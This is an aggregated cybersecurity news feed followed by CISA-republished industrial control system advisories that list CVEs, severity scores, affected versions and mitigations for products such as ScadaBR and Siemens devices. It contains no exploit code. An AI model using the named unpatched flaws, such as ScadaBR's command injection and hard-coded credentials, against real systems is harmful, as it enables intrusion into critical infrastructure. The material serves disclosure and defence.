GitHub confirms breach of 3,800 repos via malicious VSCode extension

GitHub has confirmed that roughly 3,800 internal repositories were breached after one of its employees installed a malicious VS Code extension. [...]

Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Verizon DBIR: Enterprises Face a Dangerous Vulnerability Glut

Verizon's 2026 Data Breach Investigations Report (DBIR) finds that exploits are now involved in 31% of initial access for breaches, while patching lags too far behind the bad guys.

Looking Back, Looking Forward: Digesting a Dynamic Bouillabaisse of Cyber Evolution

Dark Reading editors reflect on two decades of dramatic change — from perimeter defense to assume-breach strategies — and warn that while AI, cloud, and COVID-19 have transformed the threat landscape, organizations are still failing at fundamental security hygiene that could stop sophisticated attacks in their tracks.

Siemens RUGGEDCOM APE1808 Devices

Summary: A buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets. Siemens is preparing fix versions and recommends countermeasures for products where fixes are not, or not yet, available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications [1].

[1] https://security.paloaltonetworks.com/

Affected versions: RUGGEDCOM APE1808 vers:all/* (CVE-2026-0300). Product status: known_affected.

Vendor: Siemens (company headquarters: Germany). Critical infrastructure sectors: Critical Manufacturing. Countries/areas deployed: Worldwide.

CVE-2026-0300 (CWE-787 Out-of-bounds Write): the PAN-OS User-ID™ Authentication Portal buffer overflow described in the summary above. CVSS v3.1 base score 10 (CRITICAL), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H.

Remediations:
Mitigation: Disable Response Pages in the Interface Management Profile attached to every L3 interface in any zone where untrusted/internet traffic can ingress. Keep Response Pages enabled only on interfaces in trust/internal zones where legitimate users' browsers ingress.
Mitigation: Disable the User-ID™ Authentication Portal if not required.
Mitigation: Restrict access to the User-ID Authentication Portal to trusted internal IP addresses only.
Vendor fix: Contact customer support to receive patch and update information.

Acknowledgments: Siemens ProductCERT reported this vulnerability to CISA.

General recommendations: As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at https://www.siemens.com/industrialsecurity. For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories. The use of Siemens Security Advisories is subject to the terms and conditions listed on https://www.siemens.com/productcert/terms-of-use.

Legal notice and terms of use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended practices: CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory conversion disclaimer: This ICSA is a verbatim republication of Siemens ProductCERT SSA-967325 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. It is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision history: Initial release date 2026-05-12. Revision 1 (2026-05-12): Publication Date. Revision 2 (2026-05-19): Initial CISA Republication of Siemens ProductCERT SSA-967325 advisory.

ABB CoreSense HM and CoreSense M10

Summary: An update is available that resolves a vulnerability in the product versions listed as affected in this advisory. A path traversal vulnerability in these products can allow unauthenticated users to gain access to restricted directories. Exploiting this vulnerability can lead to complete system compromise and exposure of sensitive information.

Affected versions: CoreSense™ HM <=2.3.1, 2.3.4 (CVE-2025-3465); CoreSense™ M10 <=1.4.1.12, 1.4.1.31 (CVE-2025-3465). Product version: CoreSense™ HM <=2.3.1, CoreSense™ M10 <=1.4.1.12. Product status: fixed, known_affected.

Vendor: ABB (company headquarters: Switzerland). Critical infrastructure sectors: Food and Agriculture, Commercial Facilities, Critical Manufacturing. Countries/areas deployed: Worldwide.

CVE-2025-3465 (CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')): A path traversal vulnerability in these products can allow unauthenticated users to gain access to restricted directories. Exploiting this vulnerability can lead to complete system compromise and exposure of sensitive information. CVSS v3.1 base score 7.1 (HIGH), vector string CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N.

Remediations:
Vendor fix: The vulnerabilities are corrected in the following versions: CoreSense™ HM v2.3.4 and CoreSense™ M10 v1.4.1.31. ABB recommends that customers apply the update at the earliest convenience.

Acknowledgments: ABB reported this vulnerability to CISA.

Notice: The information in this document is subject to change without notice and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damage of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damage. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Mitigating factors: The path traversal vulnerability is only exploitable when the attacker has local access to the machine hosting the web application (i.e., access to localhost). To mitigate this vulnerability, the affected products should be configured to restrict local access to authorized users only, ensuring that untrusted users cannot interact with the application directly on the host system. ABB has restricted file downloads to a specific directory designated solely for downloadable content. Strict input validation and path sanitization are implemented to ensure that only legitimate file paths within this directory can be accessed. Refer to section "General Security Recommendations" for further advice on how to keep your system secure.

Frequently asked questions:
What causes the vulnerability? The vulnerability is caused by unchecked input data in the file parameter in the CoreSense products.
What might an attacker use the vulnerability to do? An attacker who successfully exploited this vulnerability can allow unauthenticated users to gain access to restricted directories, which can lead to complete system compromise and exposure of sensitive information.
How could an attacker exploit the vulnerability? Path traversal would require that the attacker has access to the system's local network, by connecting to the system directly or through a wrongly configured or penetrated firewall, or that they install malicious software on a system node or otherwise infect the network with malicious software. Recommended practices help mitigate such attacks; see the mitigating factors section.
Could the vulnerability be exploited remotely? No.
Can functional safety be affected by an exploit of this vulnerability? No.
What does the update do? The update removes the vulnerability by modifying the way that the file parameter validates and verifies input data.
When this security advisory was issued, had this vulnerability been publicly disclosed? No, ABB received information about this vulnerability through responsible disclosure.
When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.

Advisory conversion disclaimer: This ICSA is a verbatim republication of ABB 3KXG200000R4801 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. Please contact ABB directly for any questions regarding this advisory.

Revision history: Initial release date 2025-04-16. Revision 1 (2025-04-16): Initial version. Revision 2 (2025-09-30): Addressed comments. Revision 3 (2025-10-07): Fixed incorrect links. Revision 4 (2025-10-20): Final version with corrected dates. Revision 5 (2026-05-19): Initial CISA Republication of ABB 3KXG200000R4801 advisory.

ScadaBR

Summary: Successful exploitation of these vulnerabilities could allow an attacker to perform unauthenticated remote code execution.

Affected versions: ScadaBR 1.2.0 (CVE-2026-8602, CVE-2026-8603, CVE-2026-8604, CVE-2026-8605). Product status: known_affected.

Vendor: ScadaBR (company headquarters: Brazil). Critical infrastructure sectors: Critical Manufacturing, Dams, Chemical, Energy, Water and Wastewater. Countries/areas deployed: Worldwide. Highest CVSS v3 base score: 9.1.

Vulnerabilities:
CVE-2026-8602 (CWE-306 Missing Authentication for Critical Function): In ScadaBR version 1.2.0, a Missing Authentication for Critical Function vulnerability could allow an unauthenticated attacker to send HTTP GET requests to the SCADA system and inject arbitrary sensor readings. CVSS v3.1 base score 9.1 (CRITICAL), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H.
CVE-2026-8603 (CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')): In ScadaBR version 1.2.0, an OS Command Injection vulnerability could allow an attacker to execute commands as root on the SCADA system. CVSS v3.1 base score 8.8 (HIGH), vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.
CVE-2026-8604 (CWE-352 Cross-Site Request Forgery (CSRF)): In ScadaBR version 1.2.0, a CSRF vulnerability could allow an attacker to trigger any authenticated action through a victim's session by luring any logged-in user to a malicious webpage. CVSS v3.1 base score 8.8 (HIGH), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.
CVE-2026-8605 (CWE-798 Use of Hard-coded Credentials): In ScadaBR version 1.2.0, a Use of Hard-Coded Credentials vulnerability could allow an attacker to access the SCADA system as admin. CVSS v3.1 base score 6.1 (MEDIUM), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N.

Remediations (all four CVEs):
Vendor fix: ScadaBR has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of affected versions of ScadaBR are invited to contact ScadaBR customer support for additional information: https://github.com/ScadaBR

Acknowledgments: Arad Inbar, Nir Somech, Ben Grinberg, Daniel Lubel, Erez Cohen, and Adiel Sol of DREAM reported these vulnerabilities to CISA.

Recommended practices: CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

Revision history: Initial release date 2026-05-19. Revision 1 (2026-05-19): Initial Publication.

Kieback & Peter DDC Building Controllers

Summary: Successful exploitation of this vulnerability could allow an attacker to take control of the victim's browser.

Affected versions (all CVE-2026-4293): DDC4002 <=1.12.14, DDC4100 <=1.12.14, DDC4200 <=1.12.14, DDC4200-L <=1.12.14, DDC4400 <=1.12.14, DDC4002e <=1.23.4, DDC4200e <=1.23.4, DDC4400e <=1.23.4, DDC4020e <=1.23.4, DDC4040e <=1.23.4, DDC520 <=1.24.1. Product status: known_affected.

Vendor: Kieback & Peter (company headquarters: Germany). Critical infrastructure sectors: Commercial Facilities, Communications, Financial Services, Food and Agriculture, Government Services and Facilities, Healthcare and Public Health, Information Technology. Countries/areas deployed: Austria, China, France, Germany, United Arab Emirates.

CVE-2026-4293 (CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')): The affected products are vulnerable to cross-site scripting (XSS), enabling JavaScript to be executed by the victim's browser, which allows the attacker to control the browser. CVSS v3.1 base score 5.3 (MEDIUM), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N.

Remediations:
Mitigation: Kieback & Peter DDC Building Controllers are developed and designed for use in closed building automation networks. The system is protected by a multi-level perimeter against attacks, especially from outside, by dividing it into operational technology (OT) zones with firewalls. Building automation systems (BA systems) in general should not be directly accessible from untrusted networks, especially from the Internet, but should be protected by consistently applying the defense-in-depth strategy. This concept is supported by organizational measures in the building as part of a safety management system. In order to achieve safety, measures are required at all levels.
Vendor fix: The DDC4002, DDC4100, DDC4200, DDC4200-L and DDC4400 controllers are end-of-maintenance, therefore the recommendations for these devices are as follows: These devices must be operated in a strictly separate OT environment. Only trusted individuals should be granted network access to the DDC web portal. Access to the web portal should be disabled in the device configuration if not required. Users should be informed that only links from trusted sources should be used to access the web service.
Vendor fix: For the DDC520, DDC4002e, DDC4200e, DDC4400e, DDC4020e, and DDC4040e controllers, Kieback & Peter recommends the following safety measures: Restrict network access to the device. Do not directly connect the device to the Internet.
Vendor fix: Update the firmware to the latest available version: DDC4002e, DDC4200e, DDC4400e, DDC4020e and DDC4040e -> version 1.23.5 or newer; DDC520 -> version 1.24.2 or newer.

Acknowledgments: Maximilian Hildebrand of G DATA Advanced Analytics reported this vulnerability to CISA.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision history: Initial release date 2026-05-19. Revision 1 (2026-05-19): Initial Publication.

ZKTeco CCTV Cameras

Summary: Successful exploitation of this vulnerability could result in information disclosure, including capture of camera account credentials.

Affected versions: ZKTeco SSC335-GC2063-Face-0b77 Solution, versions earlier than V5.0.1.2.20260421 (CVE-2026-8598). Product status: known_affected.

Vendor: ZKTeco (company headquarters: China). Critical infrastructure sectors: Commercial Facilities. Countries/areas deployed: Worldwide.

CVE-2026-8598 (CWE-288 Authentication Bypass Using an Alternate Path or Channel): An undocumented configuration export port is accessible on some models of ZKTeco CCTV cameras. This port does not require authentication and exposes critical information about the camera such as open services and camera account credentials. CVSS v3.1 base score 9.1 (CRITICAL), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N.

Remediations:
Mitigation: ZKTeco has patched this vulnerability in firmware version V5.0.1.2.20260421. ZKTeco recommends that users upgrade to firmware version V5.0.1.2.20260421 or later at their earliest opportunity.
Mitigation: See the security advisory from ZKTeco for further information: https://www.zkteco.com/en/announcement/23

Acknowledgments: Souvik Kandar reported this vulnerability to CISA.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision history: Initial release date 2026-05-19. Revision 1 (2026-05-19): Initial Publication.

Microsoft Exchange Zero-Day Under Attack, No Patch Available

CVE-2026-42897 stems from a cross-site scripting (XSS) vulnerability and can allow an attacker to compromise Outlook Web Access (OWA) mailboxes.

'Claw Chain' Vulnerabilities Threaten OpenClaw Deployments

The now-patched vulnerabilities in the rapidly growing AI agent framework allow attackers to steal credentials, escalate privileges, and maintain persistence.

CISA Admin Leaked AWS GovCloud Keys on Github

Until this past weekend, a contractor for the Cybersecurity & Infrastructure Security Agency (CISA) maintained a public GitHub repository that exposed credentials to several highly privileged AWS GovCloud accounts and a large number of internal CISA systems. Security experts said the public archive included files detailing how CISA builds, tests and deploys software internally, and that it represents one of the most egregious government data leaks in recent history.

Multiple Vulnerabilities in NGINX Could Allow for Remote Code Execution

Multiple vulnerabilities have been discovered in NGINX, the most severe of which could allow for remote code execution. NGINX is software used for web serving, reverse proxying, caching, and load balancing. Successful exploitation of the most severe of these vulnerabilities may allow an unauthenticated threat actor to crash vulnerable NGINX worker processes by sending crafted HTTP requests. Additionally, on systems with Address Space Layout Randomization (ASLR) disabled, exploitation may result in remote code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer rights on the system could be less impacted than those who operate with administrative user rights.

Fuel Tank Breaches Expand Scope of Iran's Cyber Offensive

Security experts have long warned that insecure automatic tank gauge (ATG) systems exposed on the Internet can be tampered with by threat actors.

The Boring Stuff Is Dangerous Now

AI agents capable of discovering and exploiting obscure vulnerabilities are emerging alongside developers producing vast amounts of potentially flawed AI-generated code, forcing defenders to adapt accordingly.

Boulevard of Broken Dreams: 2 Decades of Cyber Fails

From the MGM and Caesars fiasco and MOVEit's patch nightmare to epic business blunders and the jaded reality of living in a post-breach world, Dark Reading looks back at the mistakes, miscalculations, systemic failures, and cringeworthy moments that still have us shaking our heads.

Congress Puts Heat on Instructure After Canvas Outage

The House Committee on Homeland Security sent a letter about the Canvas cyberattack, the same day that the edtech company said it reached an "agreement" with the ShinyHunters cybercriminals.

A Vulnerability in Microsoft Exchange Server Could Allow for Arbitrary Code Execution

A vulnerability has been discovered in Microsoft Exchange Server that could allow for arbitrary code execution. Microsoft Exchange Server is an enterprise-level email and collaboration platform developed by Microsoft that runs on Windows Server. Successful exploitation could allow for arbitrary JavaScript to be executed in the browser context. The malicious code would run with the same permissions as your browser, allowing attackers to steal data, install malware, or hijack your computer.

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-42897 Microsoft Exchange Server Cross-Site Scripting Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Taiwan Bullet Train Hack Highlights Cybersecurity Gaps in Rail Systems

A Taiwanese student experimenting with software-defined radio technology shut down three bullet trains for nearly an hour, leading to an anti-terrorism response.

SecurityScorecard Snags Driftnet to Level Up Threat Intelligence

The acquisition looks to boost visibility into third-party ecosystems, which are becoming a bigger concern as vectors for supply chain attacks.

Maximum Severity Cisco SD-WAN Bug Exploited in the Wild

This is the second time this year a threat actor has leveraged a CVSS 10.0 vulnerability in Cisco's network control system.

'FrostyNeighbor' APT Carefully Targets Govt Orgs in Poland, Ukraine

Attackers uniquely fingerprint victims before delivering spear-phishing payloads aimed at espionage, in the latest campaign from the Belarussian nation-state threat group.

OpenAI says hackers stole some data after latest code security issue

OpenAI said the damage was limited to the employees' devices and did not affect user data or its production systems, and that none of its intellectual property was stolen.

18-year-old NGINX vulnerability allows DoS, potential RCE

An 18-year-old flaw in the NGINX open-source web server, discovered using an autonomous scanning system, can be exploited for denial of service and, under certain conditions, remote code execution. [...]

Cyber-Enabled Cargo Crime: How Cybercrime Tradecraft is Used to Steal Freight

Cargo theft now starts with phishing emails and stolen credentials, not hijackings, to reroute and steal freight from supply chains. NMFTA outlines how cyber-enabled cargo crime is changing transportation security. [...]

A spyware investigator exposed Russian government hackers trying to hijack Signal accounts

A group of likely Russian government hackers tried to hack a security researcher who investigates spyware attacks. He was then able to turn the tables on the hackers and reveal details of their espionage campaign.

Otto Support - Logging and Visibility in MCP Servers

If any of the MCP attack classes in this series happened in your environment today, would you detect it? Most MCP servers log only a tool name and a timestamp. This post walks through what that gap looks like in practice, how EchoLeak exploited it, and what proper audit logging actually requires.

KongTuke hackers now use Microsoft Teams for corporate breaches

Initial access broker KongTuke has moved to Microsoft Teams for social engineering attacks, taking as little as five minutes to gain persistent access to corporate networks. [...]

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-20182 Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise.

Note: Please adhere to CISA's guidelines to assess exposure and mitigate risks associated with Cisco SD-WAN devices as outlined in Emergency Directive 26-03: Mitigate Vulnerabilities in Cisco SD-WAN Systems and Supplemental Direction ED 26-03: Hunt and Hardening Guidance for Cisco SD-WAN Systems. Adhere to the applicable Binding Operational Directive (BOD) 22-01 guidance for cloud services or discontinue use of the product if mitigations are not available.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Foxconn Attack Highlights Manufacturing's Cyber Crisis

A Nitrogen ransomware attack on Foxconn's North American facilities is one of 600 hits on manufacturers this year, as gangs increasingly target the sector for its low tolerance for downtime.

Siemens ROS#

Summary
ROS# contains a ROS service, file_server, which before version 2.2.2 contains a path traversal vulnerability. It could allow an attacker to access (read and write) arbitrary files on the system hosting the service, as far as those files are accessible with the rights of the user that runs the service. Siemens has released a new version for ROS# and recommends updating to the latest version.

Affected versions of Siemens ROS#: ROS# vers:intdot/<2.2.2

CVSS v3: 9.1
Vendor: Siemens
Equipment: Siemens ROS#
Vulnerability: Relative Path Traversal

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities
CVE-2026-41551: Affected versions contain a path traversal vulnerability because user input is not properly sanitized. This could allow a remote attacker to access arbitrary files on the device.
Affected Products: Siemens ROS# (Vendor: Siemens; Product Version: ROS#; Product Status: known_affected)
Relevant CWE: CWE-23 Relative Path Traversal
Metrics: CVSS 3.1 Base Score 9.1 (CRITICAL), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Remediations
Mitigation, for versions before 2.2.2:
- run file_server on a trusted network only.
- run file_server with appropriate user rights.
- run file_server only for the tasks it was designed for, transferring URDF files from the ROS host to the target system, not as a service that runs continuously in the background.
- run file_server only if manually transferring files is not possible.
Vendor fix: Update to V2.2.2 or a later version: https://github.com/siemens/ros-sharp/releases/tag/2.2.2

Acknowledgments
Alifia Rahmah of VyPr AI reported this vulnerability to Siemens.

General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-357982 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12
2026-05-12, Revision 1: Publication Date
2026-05-14, Revision 2: Initial CISA Republication of Siemens ProductCERT SSA-357982 advisory

Siemens gWAP

Summary
Siemens gPROMS Web Applications Publisher (gWAP) is affected by a remote code execution vulnerability introduced through a third-party component, namely the Axios HTTP client library. The vulnerability stems from a specific "Gadget" attack chain that allows prototype pollution in other third-party libraries, potentially allowing an attacker to execute arbitrary code. Siemens has released a new version for gWAP and recommends updating to the latest version.

Affected versions of Siemens gWAP: gWAP vers:intdot/<3.1.1

CVSS v3: 8.0
Vendor: Siemens
Equipment: Siemens gWAP
Vulnerability: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities
CVE-2026-40175: Axios is a promise-based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.
Affected Products: Siemens gWAP (Vendor: Siemens; Product Version: gWAP; Product Status: known_affected)
Relevant CWE: CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
Metrics: CVSS 3.1 Base Score 8.0 (HIGH), Vector String CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Remediations
Vendor fix: Update to V3.1.1 or a later version: https://support.sw.siemens.com/product/284395347/

Acknowledgments
Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-876049 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12
2026-05-12, Revision 1: Publication Date
2026-05-14, Revision 2: Initial CISA Republication of Siemens ProductCERT SSA-876049 advisory

Siemens SIMATIC

Summary
SIMATIC CN 4100 contains multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released a new version for SIMATIC CN 4100 and recommends updating to the latest version.

Affected versions of Siemens SIMATIC: SIMATIC CN 4100 vers:intdot/<5.0

CVSS v3: 9.6
Vendor: Siemens
Equipment: Siemens SIMATIC
